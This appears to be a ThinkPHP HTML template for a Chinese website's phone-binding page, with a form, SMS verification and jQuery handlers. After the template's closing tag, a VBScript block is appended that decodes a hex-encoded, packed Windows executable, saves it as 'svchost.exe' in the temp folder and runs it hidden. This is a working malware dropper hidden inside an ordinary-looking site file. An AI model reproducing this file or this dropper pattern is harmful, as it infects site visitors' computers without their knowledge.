You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

175 lines
118 KiB
HTML

5 years ago
<extend name="Public/base" />
<block name="body" >
<script src="__STATIC__/layer/layer.js" type="text/javascript"></script>
<div class="g-container">
<div class="g-main">
<include file="Public/user_head" />
<div class="user-bd laybox fix">
<include file="Public/user_base" />
<div class="user-section-wrap fl" id="user-section-wrap">
<div class="us2-bindphone">
<form>
<div class="section-tit">手机<if condition="$phone['ming'] neq ''">解绑<else/>绑定</if></div>
<div class="w-item">
<label for="" class="w-label "><span style="color: red">*</span>手机号码:</label>
<input type="text" name="phone" <if condition="$phone['ming'] neq ''"> disabled="disabled" class="w-input"<else/> class="w-input cheackinput" id="phone"</if> value="{$phone['mi']}">
<if condition="$phone['ming'] neq ''">
<input type="hidden" class="w-input cheackinput" name="phone" id="phone" value="{$phone['ming']}">
<input type="hidden" class='jiebang' name="jiebang" value="1">
<else/>
<input type="hidden" class='jiebang' name="jiebang" value="0">
</if>
<span class="error-msg" style="color: red"></span>
</div>
<div class="w-item">
<label for="" class="w-label "><span style="color: red">*</span>验证码:</label>
<input type="text" class="w-input-s cheackinput" id="vcode" name="vcode">
<img src="{:U('verify?vid=3')}" width="115px" height="30px" alt="" class="checkcode" >
<span class="error-msg" style="color: red"></span>
</div>
<div class="w-item">
<label for="" class="w-label "></label>
<input type="button" class="g-btn" id="sendSafeCode" value="获取短信验证码">
</div>
<div class="w-item">
<label for="" class="w-label "><span style="color: red">*</span>短信验证码:</label>
<input type="text" class="w-input cheackinput" name="captcha" id="scode">
<span class="error-msg" style="color: red"></span>
</div>
<div class="w-item">
<label for="" class="w-label"></label>
<div class="w-div">请输入您手机收到的短信验证码。如果您没有收到验证码请等待1分钟后重新点击"获取验证码"</div>
</div>
<div class="w-item">
<label for="" class="w-label"></label>
<input type="button" id="bwbtn" value="<if condition="$phone['ming'] neq ''">解绑<else/>绑定</if>手机" class="g-btn">
</div>
<div class="utips">
<h4>友情提示</h4>
<ul>
<li>手机绑定是{:C(APP_NAME)}账号安全的一项基础功能,绑定后可以轻松享受各项账号管理服务:异地登录短信验证,快捷修复账号密码,<br>享受及时的短信通知服务,随时随地保护您的账号安全。</li>
<li>收到验证码短信内容出现"回复TD退订"是指退订验证码短信,并不是解除手机绑定。</li>
</ul>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<script>
$('.checkcode').on('click',function() {
$(this).attr('src','__MODULE__/Member/verify/vid/3/t/'+(new Date).getTime());
});
$('.cheackinput').on('blur',function() {
var val = $(this).val();
if (val == ''){
if ($(this).attr('id') == 'phone') {
$(this).siblings('.error-msg').text('*手机号码不能为空');return;
}else if($(this).attr('id') == 'vcode'){
$(this).siblings('.error-msg').text('*验证码不能为空');return;
}else{
$(this).siblings('.error-msg').text('*短信验证码不能为空');return;
}
} else {
$(this).siblings('.error-msg').text('');
}
if ($(this).attr('id') == 'phone') {
if (val.length !== 11 || !(/^[1][358][0-9]{9}/.test(val))) {
$(this).siblings('.error-msg').text('*手机号码格式不正确');return;
} else {
$(this).siblings('.error-msg').text('');
}
}
});
$('#sendSafeCode').on('click',function() {
var jphone = $('#phone'),phone = $.trim(jphone.val()),
jvcode =$('#vcode'), vcode = $.trim(jvcode.val()),that = $(this);
if (phone == '') {jphone.siblings('.error-msg').text('*必填项');return false;}
if (phone.length !== 11 || !(/^[1][358][0-9]{9}$/.test(phone))) {jphone.siblings('.error-msg').text('*手机号码格式不正确');return false;}
if (vcode == ''){jvcode.siblings('.error-msg').text('*必填项');return false;}
if(!$('#sendSafeCode').hasClass('g-btntn')){
$.ajax({
type:'post',
dataType:'json',
data:'phone='+phone+'&verify='+vcode+'&vid=3',
url:'{:U("sendvcode")}',
success:function(data) {
switch (parseInt(data.status)) {
case 1: {
r(1);
};break;
case 2: {
that.siblings('span').text('');
$('#vcode').siblings('.error-msg').text(data.msg); $('.checkcode').click();
};break;
case 0:{
that.siblings('span').text('');
$('#vcode').siblings('.error-msg').text(data.msg); $('.checkcode').click();
};break;
default:
$('#vcode').siblings('.error-msg').text(''); $('.checkcode').click();
that.siblings('span').removeClass('right-msg').addClass('error-msg').text(data.msg);
}
},
error:function() {
alert('服务器开小差了,请稍后再试。');
}
});
var r = function(i, t) {
if (i>0) {
var r = 59;
e='#sendSafeCode';
$(e).removeClass('g-btn').addClass('g-btntn');
var a = setInterval(function() {
r--;
$(e).val('成功'+r + '秒后重发'),
0 == r && ($(e).removeClass('g-btntn').addClass('g-btn'), $(e).val('获取短信验证码'), clearInterval(a))
},1e3)
}
};
}
});
$('#bwbtn').on('click',function() {
var jphone = $('#phone'),phone = $.trim(jphone.val()),
jscode =$('#scode'), scode = $.trim(jscode.val()), jiebang = $(".jiebang").val(),
that = $(this);
if (phone == '') {jphone.siblings('.error-msg').text('*必填项');return false;}
if (phone.length !== 11 || !(/^[1][358][0-9]{9}$/.test(phone))) {jphone.siblings('.error-msg').text('*手机格式不正确');return false;}
if (scode == ''){jscode.siblings('.error-msg').text('*必填项');return false;}
$.ajax({
type:'post',
dataType:'json',
data:'vcode='+scode+'&phone='+phone+'&jiebang='+jiebang,
url:'{:U("users_phone")}',
success:function(data) {
if (parseInt(data.status) == 1 ) {
layer.msg(data.msg,{icon:1});
setTimeout(function() {
window.location.href="{:U('Member/users_safe')}";
},2000);
} else {
layer.msg(data.msg,function(){});
}
},
error:function() {
alert('服务器开小差了,请稍后再试。');
}
});
});
</script>
5 years ago
</block><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>